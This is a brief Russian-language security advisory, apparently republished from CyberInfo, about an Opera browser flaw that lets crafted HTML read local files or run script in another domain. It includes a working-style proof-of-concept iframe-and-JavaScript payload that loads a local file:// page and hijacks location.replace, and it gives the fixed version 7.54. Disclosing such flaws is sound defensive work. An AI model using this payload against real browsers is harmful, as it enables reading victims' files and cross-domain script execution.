Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, прочитает файлы на целевой системе пользователе или запустит в контексте удаленного домена.

Пример:

< iframe>< /iframe>
< script type="text/javascript">
onload=function () {
var oVictim=frames[0];
oVictim.location.href="file://localhost/c:
/winnt/help/ciadmin.htm";
oVictim.location.replace=function () {
oVictim.alert("We now have full file system
access using
"+location.href);
}

< /script>

Установите обновленную версию программы (7.54): www.opera.com/download/

Источник: CyberInfo